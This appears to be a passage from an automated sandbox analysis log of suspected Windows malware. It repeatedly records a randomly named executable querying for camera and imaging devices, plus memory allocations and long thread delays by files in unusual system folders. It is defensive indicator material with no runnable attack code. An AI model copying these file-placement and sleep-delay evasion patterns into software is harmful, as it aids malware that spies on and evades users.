                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeMemory allocated: 1300000 memory reserve | memory write watchJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeMemory allocated: 1AE70000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeMemory allocated: 960000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeMemory allocated: 1A820000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeMemory allocated: 990000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeMemory allocated: 1A4D0000 memory reserve | memory write watch
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeMemory allocated: 940000 memory reserve | memory write watch
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeMemory allocated: 1A5F0000 memory reserve | memory write watch
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeMemory allocated: 17A0000 memory reserve | memory write watch
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeMemory allocated: 1F60000 memory reserve | memory write watch
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeMemory allocated: 10E0000 memory reserve | memory write watch
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeMemory allocated: 1AAC0000 memory reserve | memory write watch
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeMemory allocated: 1370000 memory reserve | memory write watch
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeMemory allocated: 1AFE0000 memory reserve | memory write watch
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeMemory allocated: 780000 memory reserve | memory write watch
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeMemory allocated: 1A450000 memory reserve | memory write watch
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeMemory allocated: 1590000 memory reserve | memory write watch
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeMemory allocated: 1B2C0000 memory reserve | memory write watch
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 600000
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 599840
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 599646
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 599109
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 598984
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 598875
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 598687
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 598469
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 300000
